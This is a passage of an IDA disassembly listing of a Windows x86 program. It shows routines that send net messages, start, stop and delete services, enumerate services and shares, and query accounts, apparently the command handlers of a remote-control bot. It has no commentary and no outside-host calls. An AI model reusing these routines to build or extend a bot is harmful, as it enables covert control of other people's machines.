retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419471(char *Source,int,int)
sub_419471 proc near ; CODE XREF: sub_401CC7+567F�p
Dest = word ptr -1C0h
var_15C = byte ptr -15Ch
Str = word ptr -0F8h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C0h
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call ds:dword_4F539C ; GetVersionExA
cmp [ebp+var_90], 4
jnz short loc_4194C7
cmp [ebp+var_8C], 0
jnz short loc_4194B0
push 1
pop eax
cmp [ebp+var_84], eax
jnz short loc_4194C7
leave
retn
; ---------------------------------------------------------------------------
loc_4194B0: ; CODE XREF: sub_419471+30�j
cmp [ebp+var_8C], 0Ah
jz short loc_4194C2
cmp [ebp+var_8C], 5Ah
jnz short loc_4194C7
loc_4194C2: ; CODE XREF: sub_419471+46�j
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_4194C7: ; CODE XREF: sub_419471+27�j
; sub_419471+3B�j ...
push esi
push edi
push offset aNetapi32_dll_0 ; "netapi32.dll"
call ds:dword_4F538C ; LoadLibraryA
mov esi, eax
push offset aNetmessagebu_0 ; "NetMessageBufferSend"
push esi
call ds:dword_4F5390 ; GetProcAddress
push 32h ; MaxCount
mov edi, eax
push [ebp+Source] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _mbstowcs
push 32h ; MaxCount
lea eax, [ebp+var_15C]
push [ebp+arg_4] ; Source
push eax ; Dest
call _mbstowcs
push 32h ; MaxCount
lea eax, [ebp+Str]
push [ebp+arg_8] ; Source
push eax ; Dest
call _mbstowcs
lea eax, [ebp+Str]
push eax ; Str
call _wcslen
shl eax, 1
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+Dest]
push eax
push 0
call edi ; GetProcessHeap
add esp, 3Ch
mov edi, eax
push esi
call ds:dword_4F5410 ; FreeLibrary
mov eax, edi
pop edi
pop esi
leave
retn
sub_419471 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419551 proc near ; CODE XREF: sub_401317+F7�p
; sub_40F149+A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call _rand
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_43C4E0
call __ftol
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_419551 endp
; =============== S U B R O U T I N E =======================================
sub_41958E proc near ; CODE XREF: sub_401CC7+45BA�p
; sub_401CC7+4610�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4195E6
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_44FE90[esi]
push edi
push eax
call sub_419608
add esp, 14h
test eax, eax
jnz short loc_4195D6
push edi
push off_44FE8C[esi]
push offset asc_44FF50 ; "-"
loc_4195C6: ; CODE XREF: sub_41958E+56�j
mov esi, offset byte_4F325C
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_419603
; ---------------------------------------------------------------------------
loc_4195D6: ; CODE XREF: sub_41958E+2A�j
push eax
call sub_4196AA
pop ecx
push eax
push edi
push offset unk_44FF6C
jmp short loc_4195C6
; ---------------------------------------------------------------------------
loc_4195E6: ; CODE XREF: sub_41958E+C�j
lea eax, [eax+eax*2]
mov esi, offset byte_4F325C
push off_44FE88[eax*4]
push offset asc_44FF98 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_419603: ; CODE XREF: sub_41958E+46�j
mov eax, esi
pop edi
pop esi
retn
sub_41958E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419608 proc near ; CODE XREF: sub_41958E+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_4E30EC ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_41962F
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_4196A4
; ---------------------------------------------------------------------------
loc_41962F: ; CODE XREF: sub_419608+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_4E2FD4 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_41964F
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_41969C
; ---------------------------------------------------------------------------
loc_41964F: ; CODE XREF: sub_419608+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_419682
cmp eax, 3
jz short loc_419673
jle short loc_419695
cmp eax, 6
jg short loc_419695
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_4E3040 ; ControlService
jmp short loc_419689
; ---------------------------------------------------------------------------
loc_419673: ; CODE XREF: sub_419608+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_4E2FDC ; StartServiceA
jmp short loc_419689
; ---------------------------------------------------------------------------
loc_419682: ; CODE XREF: sub_419608+4D�j
push esi
call dword_4E3044 ; DeleteService
loc_419689: ; CODE XREF: sub_419608+69�j
; sub_419608+78�j
test eax, eax
jnz short loc_419695
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov ebx, eax
loc_419695: ; CODE XREF: sub_419608+54�j
; sub_419608+59�j ...
push esi
call dword_4E2FF0 ; CloseServiceHandle
loc_41969C: ; CODE XREF: sub_419608+45�j
push edi
call dword_4E2FF0 ; CloseServiceHandle
pop esi
loc_4196A4: ; CODE XREF: sub_419608+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_419608 endp
; =============== S U B R O U T I N E =======================================
sub_4196AA proc near ; CODE XREF: sub_41958E+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_41975F
jz loc_419758
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_419722
jz short loc_419718
mov ecx, eax
sub ecx, 3
jz short loc_41970E
dec ecx
dec ecx
jz short loc_419704
dec ecx
jz short loc_4196FA
sub ecx, 51h
jz short loc_4196F0
sub ecx, 24h
jnz loc_4197D5 ; default
; jumptable 0041977C cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_4197C7
; ---------------------------------------------------------------------------
loc_4196F0: ; CODE XREF: sub_4196AA+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_4197C7
; ---------------------------------------------------------------------------
loc_4196FA: ; CODE XREF: sub_4196AA+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_4197C7
; ---------------------------------------------------------------------------
loc_419704: ; CODE XREF: sub_4196AA+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_4197C7
; ---------------------------------------------------------------------------
loc_41970E: ; CODE XREF: sub_4196AA+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_4197C7
; ---------------------------------------------------------------------------
loc_419718: ; CODE XREF: sub_4196AA+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_4197C7
; ---------------------------------------------------------------------------
loc_419722: ; CODE XREF: sub_4196AA+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_419751
dec ecx
jz short loc_41974A
dec ecx
jz short loc_419743
dec ecx
jnz loc_4197D5 ; default
; jumptable 0041977C cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_4197C7
; ---------------------------------------------------------------------------
loc_419743: ; CODE XREF: sub_4196AA+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_41974A: ; CODE XREF: sub_4196AA+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_419751: ; CODE XREF: sub_4196AA+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_419758: ; CODE XREF: sub_4196AA+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_41975F: ; CODE XREF: sub_4196AA+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_4197D5 ; default
; jumptable 0041977C cases 1,5,6,8,9,12,13,15,16
jz short loc_4197C2
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_4197D5 ; default
; jumptable 0041977C cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_419816[ecx]
jmp ds:off_4197EE[ecx*4] ; switch jump
loc_419783: ; DATA XREF: .text:off_4197EE�o
push offset aTheSpecifiedDa ; jumptable 0041977C case 7
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_41978A: ; CODE XREF: sub_4196AA+D2�j
; DATA XREF: .text:off_4197EE�o
push offset aTheServiceDepe ; jumptable 0041977C case 17
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_419791: ; CODE XREF: sub_4196AA+D2�j
; DATA XREF: .text:off_4197EE�o
push offset aTheServiceDe_0 ; jumptable 0041977C case 10
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_419798: ; CODE XREF: sub_4196AA+D2�j
; DATA XREF: .text:off_4197EE�o
push offset aTheServiceHasB ; jumptable 0041977C case 0
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_41979F: ; CODE XREF: sub_4196AA+D2�j
; DATA XREF: .text:off_4197EE�o
push offset aTheSpecified_0 ; jumptable 0041977C case 2
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_4197A6: ; CODE XREF: sub_4196AA+D2�j
; DATA XREF: .text:off_4197EE�o
push offset aTheServiceCoul ; jumptable 0041977C case 11
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_4197AD: ; CODE XREF: sub_4196AA+D2�j
; DATA XREF: .text:off_4197EE�o
push offset aTheServiceHa_0 ; jumptable 0041977C case 14
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_4197B4: ; CODE XREF: sub_4196AA+D2�j
; DATA XREF: .text:off_4197EE�o
push offset aTheRequested_1 ; jumptable 0041977C case 3
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_4197BB: ; CODE XREF: sub_4196AA+D2�j
; DATA XREF: .text:off_4197EE�o
push offset aTheServiceHasN ; jumptable 0041977C case 4
jmp short loc_4197C7
; ---------------------------------------------------------------------------
loc_4197C2: ; CODE XREF: sub_4196AA+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_4197C7: ; CODE XREF: sub_4196AA+41�j
; sub_4196AA+4B�j ...
push offset byte_4F2B9C ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_4197E8
; ---------------------------------------------------------------------------
loc_4197D5: ; CODE XREF: sub_4196AA+36�j
; sub_4196AA+89�j ...
push eax ; default
; jumptable 0041977C cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownError ; "An unknown error occurred: <%ld>"
push offset byte_4F2B9C ; Dest
call _sprintf
add esp, 0Ch
loc_4197E8: ; CODE XREF: sub_4196AA+129�j
mov eax, offset byte_4F2B9C
retn
sub_4196AA endp
; ---------------------------------------------------------------------------
off_4197EE dd offset loc_419798 ; DATA XREF: sub_4196AA+D2�r
dd offset loc_41979F ; jump table for switch statement
dd offset loc_4197B4
dd offset loc_4197BB
dd offset loc_419783
dd offset loc_419791
dd offset loc_4197A6
dd offset loc_4197AD
dd offset loc_41978A
dd offset loc_4197D5
byte_419816 db 0, 9, 1, 2 ; DATA XREF: sub_4196AA+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419828(int,char *Str,int)
sub_419828 proc near ; CODE XREF: sub_401CC7+45D8�p
var_38C = dword ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_4E30EC ; OpenSCManagerA
push ebx ; int
mov [ebp+var_C], eax
push [ebp+arg_8] ; int
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 14h
loc_419860: ; CODE XREF: sub_419828+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_4E30B8 ; EnumServicesStatusA
test eax, eax
jnz short loc_41989A
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_41994E
loc_41989A: ; CODE XREF: sub_419828+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_419945
lea esi, [ebp+var_188]
loc_4198AB: ; CODE XREF: sub_419828+117�j
mov eax, [esi+8]
dec eax
jz short loc_4198F4
dec eax
jz short loc_4198ED
dec eax
jz short loc_4198E6
dec eax
jz short loc_4198DF
dec eax
jz short loc_4198D8
dec eax
jz short loc_4198D1
dec eax
jz short loc_4198CA
push offset aUnknown_0 ; " Unknown"
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_4198CA: ; CODE XREF: sub_419828+99�j
push offset aPaused ; " Paused"
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_4198D1: ; CODE XREF: sub_419828+96�j
push offset aPausing ; " Pausing"
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_4198D8: ; CODE XREF: sub_419828+93�j
push offset aContinuing ; " Continuing"
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_4198DF: ; CODE XREF: sub_419828+90�j
push offset aRunning ; " Running"
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_4198E6: ; CODE XREF: sub_419828+8D�j
push offset aStoping ; " Stoping"
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_4198ED: ; CODE XREF: sub_419828+8A�j
push offset aStarting ; " Starting"
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_4198F4: ; CODE XREF: sub_419828+87�j
push offset aStopped ; " Stopped"
loc_4198F9: ; CODE XREF: sub_419828+A0�j
; sub_419828+A7�j ...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+Dest]
pop ecx
push dword ptr [esi]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_2 ; "%s: %s (%s)"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+var_38C]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_4198AB
loc_419945: ; CODE XREF: sub_419828+77�j
cmp [ebp+var_8], ebx
jnz loc_419860
loc_41994E: ; CODE XREF: sub_419828+6C�j
push [ebp+var_C]
call dword_4E2FF0 ; CloseServiceHandle
xor eax, eax
pop edi
cmp eax, [ebp+var_4]
pop esi
pop ebx
sbb eax, eax
neg eax
leave
retn
sub_419828 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419965(int,char *Str,int)
sub_419965 proc near ; CODE XREF: sub_401CC7+46C3�p
; sub_401CC7+46DF�p
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Str]
test edi, edi
jz loc_4199FF
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_41998E
dec eax
jnz short loc_4199DF
push edi
push 0
call sub_419B38
pop ecx
pop ecx
jmp short loc_4199DB
; ---------------------------------------------------------------------------
loc_41998E: ; CODE XREF: sub_419965+18�j
cmp [ebp+arg_8], 0
jnz short loc_4199CD
push 24h ; Val
push edi ; Str
call _strchr
pop ecx
test eax, eax
pop ecx
jnz short loc_4199CD
push 57h
pop eax
loc_4199A5: ; CODE XREF: sub_419965+78�j
push eax
call sub_41A32C
pop ecx
push eax
lea eax, [esi+esi*2]
push edi
mov esi, offset byte_4F2E58
push off_44FE88[eax*4]
push offset asc_450510 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_419A1F
; ---------------------------------------------------------------------------
loc_4199CD: ; CODE XREF: sub_419965+2D�j
; sub_419965+3B�j
push [ebp+arg_8] ; int
push edi ; Str
push 0 ; int
call sub_419A8C
add esp, 0Ch
loc_4199DB: ; CODE XREF: sub_419965+27�j
test eax, eax
jnz short loc_4199A5
loc_4199DF: ; CODE XREF: sub_419965+1B�j
lea eax, [esi+esi*2]
push edi
mov esi, offset byte_4F2E58
push off_44FE8C[eax*4]
push offset asc_4504F4 ; "-"
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_419A1F
; ---------------------------------------------------------------------------
loc_4199FF: ; CODE XREF: sub_419965+A�j
mov eax, [ebp+arg_0]
mov esi, offset byte_4F2E58
lea eax, [eax+eax*2]
push off_44FE88[eax*4]
push offset asc_45053C ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_419A1F: ; CODE XREF: sub_419965+66�j
; sub_419965+98�j
mov eax, esi
pop edi
pop esi
pop ebp
retn
sub_419965 endp
; =============== S U B R O U T I N E =======================================
sub_419A25 proc near ; CODE XREF: sub_41AD5D+245�p
arg_0 = dword ptr 4
arg_C = dword ptr 10h
push esi
xor esi, esi
cmp [esp+4+arg_0], esi
jnz short loc_419A32
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_419A32: ; CODE XREF: sub_419A25+7�j
push ebx
push ebp
push edi
push esi
push esi
push esi
mov edi, ds:dword_4F5450
push esi
push 0FFFFFFFFh
mov ebx, 400h
push [esp+24h+arg_0]
push ebx
push esi
call edi ; WideCharToMultiByte
test byte_4F3058, 1
mov ebp, eax
jnz short loc_419A6F
or byte_4F3058, 1
lea eax, [ebp+1]
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov dword_4F2DF8, eax
loc_419A6F: ; CODE XREF: sub_419A25+32�j
push esi
push esi
push ebp
push dword_4F2DF8
push 0FFFFFFFFh
push [esp+18h+arg_C]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_4F2DF8
pop edi
pop ebp
pop ebx
pop esi
retn
sub_419A25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419A8C(int,char *Str,int)
sub_419A8C proc near ; CODE XREF: sub_419965+6E�p
; sub_41B081+184�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push [ebp+arg_0]
call sub_419AF7
push [ebp+Str]
mov edi, eax
call sub_419AF7
push 24h ; Val
mov [ebp+var_20], eax
push [ebp+Str] ; Str
call _strchr
push [ebp+arg_8]
mov [ebp+var_14], 7Fh
neg eax
sbb eax, eax
and [ebp+var_18], 0
or [ebp+var_10], 0FFFFFFFFh
and [ebp+var_C], 0
and eax, 80000000h
mov [ebp+var_1C], eax
call sub_419AF7
add esp, 14h
mov [ebp+var_8], eax
and [ebp+var_4], 0
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_20]
push eax
push 2
push edi
call dword_4E2FEC
pop edi
leave
retn
sub_419A8C endp
; =============== S U B R O U T I N E =======================================
sub_419AF7 proc near ; CODE XREF: sub_419A8C+A�p
; sub_419A8C+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_419B04
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419B04: ; CODE XREF: sub_419AF7+9�j
push ebx
push esi
mov esi, ds:dword_4F5454
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov ebx, eax
push edi
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_419AF7 endp
; =============== S U B R O U T I N E =======================================
sub_419B38 proc near ; CODE XREF: sub_419965+20�p
; sub_41AD5D+1BB�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_419AF7
push [esp+8+arg_4]
mov esi, eax
call sub_419AF7
pop ecx
pop ecx
push 0
push eax
push esi
call dword_4E2FC4
pop esi
retn
sub_419B38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419B5B(int,char *Str,int,int)
sub_419B5B proc near ; CODE XREF: sub_401CC7+46FF�p
Dest = byte ptr -210h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_419AF7
xor esi, esi
mov [ebp+var_C], eax
push esi ; int
mov [ebp+arg_C], esi
push [ebp+arg_8] ; int
mov [ebp+var_8], esi
mov [ebp+var_10], esi
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 18h
loc_419B94: ; CODE XREF: sub_419B5B+10F�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 1F6h
push [ebp+var_C]
call dword_4E303C
mov ebx, eax
cmp ebx, esi
jz short loc_419BF7
cmp ebx, 0EAh
jz short loc_419BF7
push ebx
push ebx
call sub_41A32C
pop ecx
push eax
lea eax, [ebp+Dest]
push offset asc_4505B8 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 24h
jmp short loc_419C64
; ---------------------------------------------------------------------------
loc_419BF7: ; CODE XREF: sub_419B5B+5D�j
; sub_419B5B+65�j
push 1
pop edi
cmp [ebp+arg_C], edi
jb short loc_419C5B
mov eax, [ebp+var_4]
lea esi, [eax+14h]
loc_419C05: ; CODE XREF: sub_419B5B+FC�j
push dword ptr [esi+10h]
call dword_4E2FE0 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_419C1C
mov eax, offset aNo ; "No"
loc_419C1C: ; CODE XREF: sub_419B5B+BA�j
push eax
lea eax, [ebp+Dest]
push dword ptr [esi]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax ; Dest
call _sprintf
push 1 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+arg_C]
jbe short loc_419C05
xor esi, esi
loc_419C5B: ; CODE XREF: sub_419B5B+A2�j
push [ebp+var_4]
call dword_4E3188
loc_419C64: ; CODE XREF: sub_419B5B+9A�j
cmp ebx, 0EAh
jz loc_419B94
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_419B5B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419C7C proc near ; CODE XREF: sub_401CC7+4752�p
; sub_401CC7+477F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
Str = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_419D21
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_419CBE
dec eax
jz short loc_419CB3
dec eax
jnz short loc_419CD9
push [ebp+arg_14] ; int
push [ebp+Str] ; Str
push [ebp+arg_C] ; int
push ebx ; int
push edi ; int
call sub_419DC3
add esp, 14h
jmp short loc_419CD5
; ---------------------------------------------------------------------------
loc_419CB3: ; CODE XREF: sub_419C7C+1D�j
push ebx
push edi
call sub_419DA2
pop ecx
pop ecx
jmp short loc_419CD5
; ---------------------------------------------------------------------------
loc_419CBE: ; CODE XREF: sub_419C7C+1A�j
cmp [ebp+arg_8], edi
jz short loc_419CD2
push [ebp+arg_8]
push ebx
push edi
call sub_419D48
add esp, 0Ch
jmp short loc_419CD5
; ---------------------------------------------------------------------------
loc_419CD2: ; CODE XREF: sub_419C7C+45�j
push 57h
pop eax
loc_419CD5: ; CODE XREF: sub_419C7C+35�j
; sub_419C7C+40�j ...
cmp eax, edi
jnz short loc_419CF9
loc_419CD9: ; CODE XREF: sub_419C7C+20�j
lea eax, [esi+esi*2]
push ebx
mov esi, offset byte_4F305C
push off_44FE8C[eax*4]
push offset asc_4505E0 ; "-"
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_419D41
; ---------------------------------------------------------------------------
loc_419CF9: ; CODE XREF: sub_419C7C+5B�j
push eax
call sub_41A32C
pop ecx
push eax
lea eax, [esi+esi*2]
push ebx
mov esi, offset byte_4F305C
push off_44FE88[eax*4]
push offset asc_450600 ; "-"
push esi ; Dest
call _sprintf
add esp, 14h
jmp short loc_419D41
; ---------------------------------------------------------------------------
loc_419D21: ; CODE XREF: sub_419C7C+D�j
mov eax, [ebp+arg_0]
mov esi, offset byte_4F305C
lea eax, [eax+eax*2]
push off_44FE88[eax*4]
push offset asc_450630 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_419D41: ; CODE XREF: sub_419C7C+7B�j
; sub_419C7C+A3�j
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_419C7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D48 proc near ; CODE XREF: sub_419C7C+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_419AF7
push [ebp+arg_4]
mov edi, eax
call sub_419AF7
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_419AF7
add esp, 0Ch
mov [ebp+var_20], eax
and [ebp+var_14], 0
and [ebp+var_10], 0
push 1
and [ebp+var_8], 0
pop eax
lea ecx, [ebp+var_4]
push ecx
lea ecx, [ebp+var_24]
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_4E2FD0
pop edi
leave
retn
sub_419D48 endp
; =============== S U B R O U T I N E =======================================
sub_419DA2 proc near ; CODE XREF: sub_419C7C+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_419AF7
push [esp+8+arg_4]
mov esi, eax
call sub_419AF7
pop ecx
pop ecx
push eax
push esi
call dword_4E2FC0
pop esi
retn
sub_419DA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_419DC3(int,int,int,char *Str,int)
sub_419DC3 proc near ; CODE XREF: sub_419C7C+2D�p
Dest = byte ptr -204h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 204h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_419AF7
push [ebp+arg_4]
mov esi, eax
call sub_419AF7
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_4E3150
test eax, eax
mov [ebp+arg_0], eax
jnz loc_41A16B
mov eax, [ebp+var_4]
test eax, eax
jz loc_41A1A6
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+Dest]
push offset aAccountS ; "Account: %S"
